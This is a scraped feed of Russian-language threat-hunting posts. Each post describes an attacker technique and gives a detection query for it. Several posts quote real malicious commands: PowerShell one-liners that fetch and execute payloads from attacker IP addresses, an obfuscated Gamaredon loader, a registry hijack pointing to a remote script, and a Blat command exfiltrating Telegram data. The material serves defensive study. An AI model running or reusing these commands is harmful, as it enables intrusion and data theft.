Know Your Adversary
23.04.202515:46
Всем привет!
Злоумышленники продолжают использовать легитимные исполняемые файлы для DLL Side-Loading. На этот раз они злоупотребили программами от Trend Micro и Bitdefender.
Согласно отчёту компании Symantec, шпионская группа Billbug использовала исполняемый файл от Trend Micro с именем
Мы можем охотиться за подозрительной активностью этих исполняемых файлов, ориентируясь на подозрительные имена и расположения:
Увидимся завтра!
Злоумышленники продолжают использовать легитимные исполняемые файлы для DLL Side-Loading. На этот раз они злоупотребили программами от Trend Micro и Bitdefender.
Согласно отчёту компании Symantec, шпионская группа Billbug использовала исполняемый файл от Trend Micro с именем
tmdbglog.exe для сайдлоадинга вредоносной библиотеки tmdglog.dll, а также файл bds.exe от Bitdefender для сайдлоадинга DLL с именем log.dll.Мы можем охотиться за подозрительной активностью этих исполняемых файлов, ориентируясь на подозрительные имена и расположения:
event_type: "processcreatewin"
AND
proc_file_originalfilename: ("PtWatchDog.exe" OR "BDSubWiz.exe")
Увидимся завтра!
19.04.202515:17
Всем привет!
Давайте рассмотрим ещё один инструмент, который используют вымогатели для отключения решений AV/EDR. Я говорю о ZammOcide.
Это ещё один пример эксплуатации уязвимого драйвера, на этот раз драйвера Zemana Anti-Malware (zam64.sys). Разумеется, мы можем использовать это для обнаружения:
Инструмент также создает сервис с именем "
Конечно, этот инструмент используется в реальных атаках! Например, группой вымогателей CrazyHunter.
Увидимся завтра!
English version
Давайте рассмотрим ещё один инструмент, который используют вымогатели для отключения решений AV/EDR. Я говорю о ZammOcide.
Это ещё один пример эксплуатации уязвимого драйвера, на этот раз драйвера Zemana Anti-Malware (zam64.sys). Разумеется, мы можем использовать это для обнаружения:
event_type: "driverloadwin"
AND
file_name: "zam64.sys"
Инструмент также создает сервис с именем "
ZammOcide". Это мы тоже можем использовать для обнаружения:event_type: "serviceinstallwin"
AND
service_name: "ZammOcide"
Конечно, этот инструмент используется в реальных атаках! Например, группой вымогателей CrazyHunter.
Увидимся завтра!
English version
08.04.202515:22
Всем привет!
Сегодня я решил поделиться информацией об одном интересном инструменте для эксфильтрации данных, который используется группировкой Rare Werewolf. Он называется Blat.
Этот инструмент используется этой группировкой уже довольно давно. Вот пример:
Как видите, злоумышленник использует этот инструмент для эксфильтрации собранных данных мессенджера Telegram. То есть да, Blat — это просто небольшая легитимная утилита, которая позволяет злоумышленникам отправлять собранные данные по электронной почте!
Мы можем отслеживать такую активность, сосредоточив внимание на учетных данных и вложениях:
Кстати, у этого образца есть и другие интересные поведенческие особенности — взгляните!
Увидимся завтра!
Сегодня я решил поделиться информацией об одном интересном инструменте для эксфильтрации данных, который используется группировкой Rare Werewolf. Он называется Blat.
Этот инструмент используется этой группировкой уже довольно давно. Вот пример:
blat.exe -to in@vniir.nl -f "TELEGRAMКак видите, злоумышленник использует этот инструмент для эксфильтрации собранных данных мессенджера Telegram. То есть да, Blat — это просто небольшая легитимная утилита, которая позволяет злоумышленникам отправлять собранные данные по электронной почте!
Мы можем отслеживать такую активность, сосредоточив внимание на учетных данных и вложениях:
event_type: "processcreatewin"
AND
proc_file_originalfilename: "blat.exe"
AND
cmdline: ("u" AND "pw" AND "attach")
Кстати, у этого образца есть и другие интересные поведенческие особенности — взгляните!
Увидимся завтра!
06.04.202508:51
Всем привет!
Давайте снова поговорим о Mustang Panda (мы отслеживаем этот кластер под именем Horned Werewolf, если помните).
Этот противник обожает использовать DLL Side-Loading и постоянно находит новые уязвимые исполняемые файлы. Например, в этот раз кластер использовал Canon IJ Printer Assistant Tool.
Можно ли мы отследить такую активность? Конечно!
Начнём с запуска Canon IJ Printer Assistant Tool (cnmpaui.exe) из нетипичных директорий:
Ещё один показательный признак — запуск winword.exe из cnmpaui.exe для показа отвлекающего документа:
Как всегда, вы можете найти ещё больше возможностей для обнаружения, если захотите!
Удачной охоты и увидимся завтра!
English version
Давайте снова поговорим о Mustang Panda (мы отслеживаем этот кластер под именем Horned Werewolf, если помните).
Этот противник обожает использовать DLL Side-Loading и постоянно находит новые уязвимые исполняемые файлы. Например, в этот раз кластер использовал Canon IJ Printer Assistant Tool.
Можно ли мы отследить такую активность? Конечно!
Начнём с запуска Canon IJ Printer Assistant Tool (cnmpaui.exe) из нетипичных директорий:
event_type: "processcreatewin"
AND
proc_file_originalfilename: "cnmpaui.exe"
AND NOT
proc_file_path: "Canon\\Canon IJ Printer Assistant Tool"
Ещё один показательный признак — запуск winword.exe из cnmpaui.exe для показа отвлекающего документа:
event_type: "processcreatewin"
AND
proc_p_file_path: "cnmpaui.exe"
AND
proc_file_path: "winword.exe"
Как всегда, вы можете найти ещё больше возможностей для обнаружения, если захотите!
Удачной охоты и увидимся завтра!
English version
30.03.202511:37
Всем привет!
Думаю, ни для кого не секрет, что банды вымогателей часто злоупотребляют различными инструментами удаленного мониторинга и управления (RMM). Некоторые из них хорошо известны, другие же встречаются реже.
Недавно я заметил еще один RMM, который редко фигурирует в инцидентах, связанных с программами-вымогателями, – он называется NinjaRMM. Например, этот инструмент использовали злоумышленники, распространяющие Medusa.
Как всегда, начнем с обнаружения связанных сетевых запросов:
Следующий шаг – поиск распространенных имен файлов, связанных с компонентами RMM:
Наконец, можно искать переименованные бинарные файлы, используя название продукта:
Увидимся завтра!
Думаю, ни для кого не секрет, что банды вымогателей часто злоупотребляют различными инструментами удаленного мониторинга и управления (RMM). Некоторые из них хорошо известны, другие же встречаются реже.
Недавно я заметил еще один RMM, который редко фигурирует в инцидентах, связанных с программами-вымогателями, – он называется NinjaRMM. Например, этот инструмент использовали злоумышленники, распространяющие Medusa.
Как всегда, начнем с обнаружения связанных сетевых запросов:
event_type: "dnsreq"
AND
dns_rname: "ninjarmm.com"
Следующий шаг – поиск распространенных имен файлов, связанных с компонентами RMM:
event_type: "processcreatewin"
AND
proc_file_name: ("NinjaRMMAgent.exe" OR "NinjaRMMAgenPatcher.exe" OR "ninjarmm-cli.exe")
Наконец, можно искать переименованные бинарные файлы, используя название продукта:
event_type: "processcreatewin"
AND
proc_file_productname: "NinjaRMM"
Увидимся завтра!
26.03.202519:05
Всем привет!
Давайте поговорим о файлах SVG. В последнее время многие злоумышленники используют их в своих фишинговых кампаниях.
Более того, во многих случаях атакующие используют файлы с двойным расширением, например: New Purchase Order__pdf.svg. Эти файлы содержат обфусцированный JavaScript-код, который собирает учетные данные и передает их на сервер, контролируемый атакующим.
Двойное расширение делает такие файлы довольно простыми для обнаружения:
Конечно, злоумышленники могут использовать просто расширение
Увидимся завтра!
Давайте поговорим о файлах SVG. В последнее время многие злоумышленники используют их в своих фишинговых кампаниях.
Более того, во многих случаях атакующие используют файлы с двойным расширением, например: New Purchase Order__pdf.svg. Эти файлы содержат обфусцированный JavaScript-код, который собирает учетные данные и передает их на сервер, контролируемый атакующим.
Двойное расширение делает такие файлы довольно простыми для обнаружения:
event_type: "filecreatewin"
AND
file_name: ("pdf" AND "svg")
Конечно, злоумышленники могут использовать просто расширение
.svg, поэтому можно отслеживать события создания файлов SVG в папках, часто используемых для загрузки файлов, таких как Downloads, Desktop, Documents и другие.Увидимся завтра!
22.04.202515:02
Всем привет!
Мы уже несколько раз говорили о ClickFix. Но интересно наблюдать, как по-разному используется эта техника.
Согласно отчёту Proofpoint, несколько прогосударственных групп начали применять эту технику. Например, TA427 (мы отслеживаем этот кластер активности под именем Monolithic Werewolf). Злоумышленник маскировал вредоносную PowerShell-команду под регистрационный код:
Как видно, команда включает в себя типичные для вредоносных скриптов командлеты PowerShell, такие как
А вы наблюдали другие интересные способы применения ClickFix?
Увидимся завтра!
English version
Мы уже несколько раз говорили о ClickFix. Но интересно наблюдать, как по-разному используется эта техника.
Согласно отчёту Proofpoint, несколько прогосударственных групп начали применять эту технику. Например, TA427 (мы отслеживаем этот кластер активности под именем Monolithic Werewolf). Злоумышленник маскировал вредоносную PowerShell-команду под регистрационный код:
powershell -windowstyle hidden -Command iwr Как видно, команда включает в себя типичные для вредоносных скриптов командлеты PowerShell, такие как
iwr и iex. Разумеется, мы можем использовать это для проактивного поиска (или даже детектирования!):event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: ("iwr" AND "iex")
А вы наблюдали другие интересные способы применения ClickFix?
Увидимся завтра!
English version
18.04.202508:54
Всем привет!
Сегодня мы поговорим о ещё одном интересном сервисе, который злоумышленники используют для связи с серверами управления и контроля (C&C).
Согласно этому отчёту команды Kaspersky, IronHusky использовал легитимный сервер
Что это означает? Мы можем отслеживать обращения к этому домену с помощью следующего запроса:
Злоумышленник использовал упомянутую выше вредоносную программу для загрузки MysterySnail RAT.
Увидимся завтра!
Сегодня мы поговорим о ещё одном интересном сервисе, который злоумышленники используют для связи с серверами управления и контроля (C&C).
Согласно этому отчёту команды Kaspersky, IronHusky использовал легитимный сервер
https://ppng[.]io, основанный на проекте piping-server, для запроса команд и отправки результатов их выполнения.Что это означает? Мы можем отслеживать обращения к этому домену с помощью следующего запроса:
event_type: "dnsreq"
AND
dns_rname: "ppng.io"
Злоумышленник использовал упомянутую выше вредоносную программу для загрузки MysterySnail RAT.
Увидимся завтра!
07.04.202514:44
Всем привет!
Уверен, что техника ClickFix уже всем поднадоела, но позвольте показать ещё один интересный вариант, на который я недавно наткнулся.
Речь снова идёт об использовании PowerShell в злонамеренных целях. На этот раз атакующие применили его для генерации ссылки на загрузку:
Как видно, команда получает количество секунд с начала Unix эпохи (1 января 1970), использует это значение для формирования URL, загружает полезную нагрузку и выполняет её в памяти.
Конечно, такую активность можно легко обнаружить, например, используя следующую логику:
А вы встречали другие интересные скрипты в кампаниях ClickFix?
Увидимся завтра!
English version
Уверен, что техника ClickFix уже всем поднадоела, но позвольте показать ещё один интересный вариант, на который я недавно наткнулся.
Речь снова идёт об использовании PowerShell в злонамеренных целях. На этот раз атакующие применили его для генерации ссылки на загрузку:
powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 168.119.173[.]205:8080/$u|iex"Как видно, команда получает количество секунд с начала Unix эпохи (1 января 1970), использует это значение для формирования URL, загружает полезную нагрузку и выполняет её в памяти.
Конечно, такую активность можно легко обнаружить, например, используя следующую логику:
event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: ("datetime" AND "UtcNow" AND "1970" AND "iex")
А вы встречали другие интересные скрипты в кампаниях ClickFix?
Увидимся завтра!
English version
02.04.202513:53
Всем привет!
Давайте еще раз поговорим о технике Dead Drop Resolver (DDR). Команда Cyble представила отчет о FogDoor. Этот бэкдор получает команды из профиля в социальной сети, взаимодействуя с
Это значит, что мы можем отслеживать коммуникации с этим доменом:
Но это еще не все! Злоумышленник также использовал временное хранилище вебхуков,
Как всегда, больше возможностей для обнаружения можно найти в отчете.
Увидимся завтра!
English version
Давайте еще раз поговорим о технике Dead Drop Resolver (DDR). Команда Cyble представила отчет о FogDoor. Этот бэкдор получает команды из профиля в социальной сети, взаимодействуя с
bark[.]lgbt/api.Это значит, что мы можем отслеживать коммуникации с этим доменом:
event_type: "dnsreq"
AND
dns_rname: "bark.lgbt"
Но это еще не все! Злоумышленник также использовал временное хранилище вебхуков,
webhookbin[.]net, для сбора вывода выполненных команд. Мы можем искать аналогичную активность, используя ту же логику:event_type: "dnsreq"
AND
dns_rname: "webhookbin.net"
Как всегда, больше возможностей для обнаружения можно найти в отчете.
Увидимся завтра!
English version
29.03.202515:46
Всем привет!
Злоумышленники всегда нуждаются в выполнении команд через различные интерпретаторы команд и сценариев. Это хорошо известное поведение, поэтому они постоянно ищут техники обхода защитных механизмов.
Trend Micro выпустила отчет о Water Gamayun и отметила интересную технику, используемую злоумышленниками для прокси-выполнения. Атакующие злоупотребляли переименованной версией IntelliJ Command Line Runner (runnerw.exe) для выполнения PowerShell.
Разумеется, мы можем выявить похожее поведение, отлавливая запуски переименованных исполняемых файлов:
Как всегда, в отчете можно найти еще больше возможностей для обнаружения!
Увидимся завтра!
English version
Злоумышленники всегда нуждаются в выполнении команд через различные интерпретаторы команд и сценариев. Это хорошо известное поведение, поэтому они постоянно ищут техники обхода защитных механизмов.
Trend Micro выпустила отчет о Water Gamayun и отметила интересную технику, используемую злоумышленниками для прокси-выполнения. Атакующие злоупотребляли переименованной версией IntelliJ Command Line Runner (runnerw.exe) для выполнения PowerShell.
Разумеется, мы можем выявить похожее поведение, отлавливая запуски переименованных исполняемых файлов:
event_type: "processcreatewin"
AND
proc_file_originalfilename: "runnerw.exe"
AND NOT
proc_file_name: ("runnerw.exe" OR "runnerw64.exe")
Как всегда, в отчете можно найти еще больше возможностей для обнаружения!
Увидимся завтра!
English version
25.03.202515:37
Всем привет!
Я составил список инструментов, которые используются вымогателями для обхода средств защиты, и планирую рассмотреть каждый из них в блоге. Сегодня поговорим о PCHunter.
Этот инструмент используется злоумышленниками для выявления процессов, связанных с продуктами безопасности, и их завершения.
Как всегда, начнем с обнаружения исполняемого файла:
Также можно искать связанные DNS-запросы:
Наконец, полезно отслеживать события создания файлов драйверов PCHunter:
Как всегда, вот образец.
Увидимся завтра!
Я составил список инструментов, которые используются вымогателями для обхода средств защиты, и планирую рассмотреть каждый из них в блоге. Сегодня поговорим о PCHunter.
Этот инструмент используется злоумышленниками для выявления процессов, связанных с продуктами безопасности, и их завершения.
Как всегда, начнем с обнаружения исполняемого файла:
event_type: "processcreatewin"
AND
proc_file_originalfilename: "PCHunter.exe"
Также можно искать связанные DNS-запросы:
event_type: "dnsreq"
AND
dns_rname: "epoolsoft.com"
Наконец, полезно отслеживать события создания файлов драйверов PCHunter:
event_type: "filecreatewin"
AND
file_path: ("PCHunter" AND "sys")
Как всегда, вот образец.
Увидимся завтра!
21.04.202507:02
Всем привет!
Давайте поговорим о не самых распространённых методах закрепления. Согласно отчёту компании ReliaQuest, Black Basta начали использовать новый метод закрепления, основанный на перехвате Component Object Model Type Library.
При перехвате TypeLib злоумышленники изменяют записи в реестре, чтобы перенаправить легитимные COM-объекты на вредоносные скрипты или файлы.
Злоумышленники выполнили следующую команду:
Например, мы можем искать злоупотребление reg.exe с помощью запроса:
Также можно отслеживать события изменения реестра:
Увидимся завтра!
English version
Давайте поговорим о не самых распространённых методах закрепления. Согласно отчёту компании ReliaQuest, Black Basta начали использовать новый метод закрепления, основанный на перехвате Component Object Model Type Library.
При перехвате TypeLib злоумышленники изменяют записи в реестре, чтобы перенаправить легитимные COM-объекты на вредоносные скрипты или файлы.
Злоумышленники выполнили следующую команду:
reg add "HKEY_CURRENT_USER\Software\Classes\TypeLib{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64" /t REG_SZ /d "script:hxxps://drive.google[dot]com/uc?export=download^&id=1l5cMkpY9HIERae03tqqvEzCVASQKen63" /fНапример, мы можем искать злоупотребление reg.exe с помощью запроса:
event_type: "processcreatewin"
AND
proc_file_name: "reg.exe"
AND
cmdline: ("TypeLib" И "script")
Также можно отслеживать события изменения реестра:
event_type: "registryvaluesetwin"
AND
reg_key_path: "TypeLib"
AND
reg_value_data: "script"
Увидимся завтра!
English version
10.04.202515:02
Всем привет!
Sapphire Werewolf обновил Amethyst Stealer и теперь использует Canarytokens для сбора информации о скомпрометированных системах.
Хотя Canarytokens обычно применяются для обнаружения вредоносной активности, злоумышленники могут использовать их, чтобы получать уведомления о новых жертвах!
Злоумышленник использовал следующую ссылку для сбора информации о заражённой системе — включая её IP-адрес и информацию о том, является ли она виртуальной машиной:
Разумеется, мы можем охотиться за подозрительными DNS-запросами:
Больше информации о тактиках, техниках и процедурах Sapphire Werewolf можно найти в соответствующем отчёте.
Увидимся завтра!
English version
Sapphire Werewolf обновил Amethyst Stealer и теперь использует Canarytokens для сбора информации о скомпрометированных системах.
Хотя Canarytokens обычно применяются для обнаружения вредоносной активности, злоумышленники могут использовать их, чтобы получать уведомления о новых жертвах!
Злоумышленник использовал следующую ссылку для сбора информации о заражённой системе — включая её IP-адрес и информацию о том, является ли она виртуальной машиной:
hxxp://canarytokens[.]com/traffic/tags/static/xjemqlqirwqru9pkrh3j4ztmf/payments.js
Разумеется, мы можем охотиться за подозрительными DNS-запросами:
event_type: "dnsreq"
AND
dns_rname: "canarytokens.com"
Больше информации о тактиках, техниках и процедурах Sapphire Werewolf можно найти в соответствующем отчёте.
Увидимся завтра!
English version
07.04.202512:41
Всем привет! Если хотите больше узнать о применении киберразведданных - это статья для вас! А если захотите задать вопросы - присоединяйтесь к завтрашнему вебинару!
01.04.202508:36
Всем привет!
Сегодня мы рассмотрим еще один любопытный пример злоупотребления PowerShell — на этот раз от Head Mare (мы отслеживаем эту активность как Rainbow Hyena).
Злоумышленник распространял защищенные паролем архивы с вредоносными LNK-файлами. LNK-файл выполняет следующую команду PowerShell для запуска бэкдора PhantomPyramid на скомпрометированной системе:
Думаю, вы уже заметили интересные строки, которые можно использовать для обнаружения: "
Если вы хотите узнать больше об этой кампании, вот отчет команды Kaspersky.
Увидимся завтра!
English version
Сегодня мы рассмотрим еще один любопытный пример злоупотребления PowerShell — на этот раз от Head Mare (мы отслеживаем эту активность как Rainbow Hyena).
Злоумышленник распространял защищенные паролем архивы с вредоносными LNK-файлами. LNK-файл выполняет следующую команду PowerShell для запуска бэкдора PhantomPyramid на скомпрометированной системе:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "$r=$(Get-Location).Path + '\\x417\x430\x44f\x432\x43a\x430_\x413\x423\x412_5_03\x414.zip';if(Test-Path $r) { cmd.exe /c start /B $r; } else { $f=$(Get-ChildItem -Path 'C:\Users\Думаю, вы уже заметили интересные строки, которые можно использовать для обнаружения: "
WriteAllBytes", "Combine", "ReadAllBytes". Давайте сформируем логику для детектирования:event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: ("WriteAllBytes" AND "Combine" AND "ReadAllBytes")
Если вы хотите узнать больше об этой кампании, вот отчет команды Kaspersky.
Увидимся завтра!
English version
28.03.202514:25
Привет всем!
Новый день — новый инструмент. На этот раз это не обычный инструмент, а PowerTool! Это еще один популярный инструмент, который используют группировки-вымогатели для отключения средств защиты. Например, его применяют партнеры Akira.
Давайте начнем с событий создания процессов:
Еще один момент — загрузка драйвера PowerTool:
Хотите больше? Вот вам образец!
Увидимся завтра!
Новый день — новый инструмент. На этот раз это не обычный инструмент, а PowerTool! Это еще один популярный инструмент, который используют группировки-вымогатели для отключения средств защиты. Например, его применяют партнеры Akira.
Давайте начнем с событий создания процессов:
event_type: "processcreatewin"
AND
(proc_file_productname: "PowerTool"
OR
proc_file_originalfilename: "PowerTool.exe")
Еще один момент — загрузка драйвера PowerTool:
event_type: "processmoduleload"
AND
file_productname: "PowerTool"
Хотите больше? Вот вам образец!
Увидимся завтра!
24.03.202518:18
Всем привет!
Давайте поговорим еще об одном инструменте в арсенале вымогателей. На этот раз это будет HRSword! Злоумышленники обычно используют его для отключения защитных механизмов на целевой машине.
Например, согласно этому отчету, инструмент использовался Helldown ransomware для мониторинга и завершения процессов, связанных с безопасностью.
Начнем с самого бинарного файла и сфокусируемся на его метаданных:
Этот инструмент также злоупотребляет
Мы можем использовать следующую логику для обнаружения:
Хотите больше возможностей для обнаружения? Изучите образец!
Увидимся завтра!
Давайте поговорим еще об одном инструменте в арсенале вымогателей. На этот раз это будет HRSword! Злоумышленники обычно используют его для отключения защитных механизмов на целевой машине.
Например, согласно этому отчету, инструмент использовался Helldown ransomware для мониторинга и завершения процессов, связанных с безопасностью.
Начнем с самого бинарного файла и сфокусируемся на его метаданных:
event_type: "processcreatewin"
AND
proc_file_originalfilename: "HRSword.exe"
Этот инструмент также злоупотребляет
cmd.exe для копирования нескольких файлов в C:\Windows\System32\drivers\, например:cmd.exe /S /D /c" copy Drivers\x32\sysdiag.sys "C:\Windows\System32\drivers\"Мы можем использовать следующую логику для обнаружения:
event_type: "processcreatewin"
AND
proc_file_name: "cmd.exe"
AND
cmdline: ("copy" AND "drivers")
Хотите больше возможностей для обнаружения? Изучите образец!
Увидимся завтра!
20.04.202519:15
Всем привет!
Уверен, что все уже слышали о CVE-2025-24054, уязвимости, связанной с раскрытием хеша NTLM через спуфинг.
Check Point опубликовала отчёт с обзором того, как эта уязвимость используется в реальных атаках. Эксплуатация уязвимости происходит с минимальным взаимодействием со стороны пользователя — например, при выборе, просмотре или выполнении любого действия с файлом, кроме его открытия или запуска.
Злоумышленники используют вредоносные файлы с расширением
Увидимся завтра!
English version
Уверен, что все уже слышали о CVE-2025-24054, уязвимости, связанной с раскрытием хеша NTLM через спуфинг.
Check Point опубликовала отчёт с обзором того, как эта уязвимость используется в реальных атаках. Эксплуатация уязвимости происходит с минимальным взаимодействием со стороны пользователя — например, при выборе, просмотре или выполнении любого действия с файлом, кроме его открытия или запуска.
Злоумышленники используют вредоносные файлы с расширением
.library-ms, которые распространяются через фишинговые письма. Файлы с таким расширением встречаются довольно редко, поэтому мы можем отследить их появление по событиям создания файлов:event_type: "filecreate"
AND
file_path: "library-ms"
Увидимся завтра!
English version
09.04.202518:49
Всем привет!
Думаю, вы уже слышали об уязвимости нулевого дня в Common Log File System (CLFS), которая эксплуатировалась RansomEXX. Речь идет о CVE-2025-29824.
Если заглянуть в отчет Microsoft Threat Intelligence Center (MSTIC), можно заметить любопытный артефакт. В рамках эксплуатации создается CLFS BLF-файл:
Что это значит? Мы можем использовать это поведение для проактивного поиска подобной активности! Например:
Несмотря на то, что злоумышленник использовал уязвимость нулевого дня для повышения привилегий, в цепочке атаки были и легко обнаруживаемые действия — например, злоупотребление ProcDump для дампа LSASS.
Как всегда — даже в сложных случаях у нас есть масса возможностей для детектирования!
Увидимся завтра!
English version
Думаю, вы уже слышали об уязвимости нулевого дня в Common Log File System (CLFS), которая эксплуатировалась RansomEXX. Речь идет о CVE-2025-29824.
Если заглянуть в отчет Microsoft Threat Intelligence Center (MSTIC), можно заметить любопытный артефакт. В рамках эксплуатации создается CLFS BLF-файл:
C:\ProgramData\SkyPDF\PDUDrv.blf.Что это значит? Мы можем использовать это поведение для проактивного поиска подобной активности! Например:
event_type: "filecreatewin"
AND
file_path: ("programdata" AND "blf")
Несмотря на то, что злоумышленник использовал уязвимость нулевого дня для повышения привилегий, в цепочке атаки были и легко обнаруживаемые действия — например, злоупотребление ProcDump для дампа LSASS.
Как всегда — даже в сложных случаях у нас есть масса возможностей для детектирования!
Увидимся завтра!
English version
Reposted from:
BI.ZONE
07.04.202512:41
🌛 Как угрозоцентричный подход позволяет избежать ущерба от кибератак
В новой статье рассказали о подходе к кибербезопасности, который позволит сосредоточиться на самых актуальных угрозах.
Из нее вы узнаете:
🟦что это за подход,
🟦в чем его преимущества,
🟦как предотвращать реальные атаки, используя киберразведданные.
Читать статью
А чтобы закрепить материал, подключайтесь к бесплатному вебинару. На нем обсудим, как получить максимум от данных киберразведки и какие инструменты BI.ZONE Threat Intelligence помогут в проактивном поиске угроз для вашей организации.
➡️Зарегистрироваться
В новой статье рассказали о подходе к кибербезопасности, который позволит сосредоточиться на самых актуальных угрозах.
Из нее вы узнаете:
🟦что это за подход,
🟦в чем его преимущества,
🟦как предотвращать реальные атаки, используя киберразведданные.
Читать статью
А чтобы закрепить материал, подключайтесь к бесплатному вебинару. На нем обсудим, как получить максимум от данных киберразведки и какие инструменты BI.ZONE Threat Intelligence помогут в проактивном поиске угроз для вашей организации.
➡️Зарегистрироваться
31.03.202504:54
Всем привет!
Мы уже давно не обсуждали злоупотребление PowerShell, но, думаю, пора продолжить. И нам в этом поможет Gamaredon!
Группа продолжает распространять вредоносные LNK-файлы, содержащие PowerShell-код для загрузки и выполнения полезной нагрузки, а также открытия отвлекающего документа. Например:
Как видите, здесь есть несколько интересных параметров командной строки, которые можно использовать для детектирования и поиска угроз.
Я выбрал следующие параметры для обнаружения: "
Более того, аналогичный метод можно использовать для поиска похожих файлов, например, на VirusTotal.
Удачной охоты и увидимся завтра!
Мы уже давно не обсуждали злоупотребление PowerShell, но, думаю, пора продолжить. И нам в этом поможет Gamaredon!
Группа продолжает распространять вредоносные LNK-файлы, содержащие PowerShell-код для загрузки и выполнения полезной нагрузки, а также открытия отвлекающего документа. Например:
powershell.exe -WindowStyle hidden echo DsuXBGtDPVpafNQKWfGNQXRPehfejEMnZWqvtPFEKrDQRtLDoRtJCcMjEFenVKrryMHia; Write-HostZVRjgZrFwKSbjNrBtIujdNLLlPq; if (-not(Test-Path iscabv.''zi''p -PathType Leaf)){echo vgUYzpRfaoGxgCSuzlmZCRxmXRnGJKBwooBEEoJgvYqjRXoXTHaspGDtNMuMovanuZezIbSYgAmXMqDOLMczhxmvJtkBJPsVai; &(g''cm i******w*****r) -uri h''t''tp:''//''146''.''1''85''.''233''.''90''/iscabv.''zi''p -OutFile iscabv.''zi''p}; Expand-Archive -Path iscabv.''zi''p -DestinationPath Drvx64; star''t Drvx64/IsCabView.''e''xe; echo ihdfDvzZhaId; &(g''c''m *******ke-****est) -uri h''t''tp:''//''146''.''1''85''.''233''.''90''/oudid/Nak0579.doc -OutFile Nak0579.doc; sta''rt Nak0579.docКак видите, здесь есть несколько интересных параметров командной строки, которые можно использовать для детектирования и поиска угроз.
Я выбрал следующие параметры для обнаружения: "
WindowStyle hidden echo" и "Expand-Archive":event_type: "processcreatewin"
AND
proc_file_name: "powershell.exe"
AND
cmdline: ("WindowStyle hidden echo" AND "Expand-Archive")
Более того, аналогичный метод можно использовать для поиска похожих файлов, например, на VirusTotal.
Удачной охоты и увидимся завтра!
27.03.202515:48
Всем привет!
Давайте продолжим разбирать инструменты, которые используют вымогатели. На этот раз это IObit Unlocker. Злоумышленники применяют этот инструмент для разблокировки файлов и папок, которые заняты другими процессами. Например, этот инструмент входит в арсенал RansomHub.
Как всегда, мы можем анализировать метаданные или, если злоумышленник установил инструмент, искать соответствующие папки:
Вы также можете изучить образец самостоятельно и найти дополнительные возможности для обнаружения!
Увидимся завтра!
English version
Давайте продолжим разбирать инструменты, которые используют вымогатели. На этот раз это IObit Unlocker. Злоумышленники применяют этот инструмент для разблокировки файлов и папок, которые заняты другими процессами. Например, этот инструмент входит в арсенал RansomHub.
Как всегда, мы можем анализировать метаданные или, если злоумышленник установил инструмент, искать соответствующие папки:
event_type: "processcreatewin"
AND
(proc_file_productname: "IObit Unlocker"
OR
proc_file_path: "IObit")
Вы также можете изучить образец самостоятельно и найти дополнительные возможности для обнаружения!
Увидимся завтра!
English version
23.03.202510:18
Всем привет!
Вредоносные расширения для браузеров перестают быть чем-то экзотическим. Например, Rilide. Впервые о нем сообщили в апреле 2023 года, но с тех пор он стал распространенной угрозой, и этот отчет — еще одно тому доказательство.
Можем ли мы проактивно искать такие расширения? Конечно, да! Например, подобные угрозы, как правило, модифицируют LNK-файлы браузеров, добавляя аргумент --load-extension, например:
Это значит, что мы можем искать выполнение популярных браузеров на основе Chromium с этим аргументом:
Конечно, вы получите ложные срабатывания, но разве не этого мы ждем от проактивного поиска угроз (Threat Hunting)? Уверен, правильная фильтрация вам поможет!
Увидимся завтра!
Вредоносные расширения для браузеров перестают быть чем-то экзотическим. Например, Rilide. Впервые о нем сообщили в апреле 2023 года, но с тех пор он стал распространенной угрозой, и этот отчет — еще одно тому доказательство.
Можем ли мы проактивно искать такие расширения? Конечно, да! Например, подобные угрозы, как правило, модифицируют LNK-файлы браузеров, добавляя аргумент --load-extension, например:
chrome.exe --load-extension="C:\Users\user\AppData\Local\Temp\MalExt" Это значит, что мы можем искать выполнение популярных браузеров на основе Chromium с этим аргументом:
event_type: "processcreatewin"
AND
proc_file_name: ("chrome.exe" OR "brave.exe" OR "opera.exe" OR "msedge.exe")
AND
cmdline: "load-extension"
Конечно, вы получите ложные срабатывания, но разве не этого мы ждем от проактивного поиска угроз (Threat Hunting)? Уверен, правильная фильтрация вам поможет!
Увидимся завтра!
Shown 1 - 24 of 31
Log in to unlock more functionality.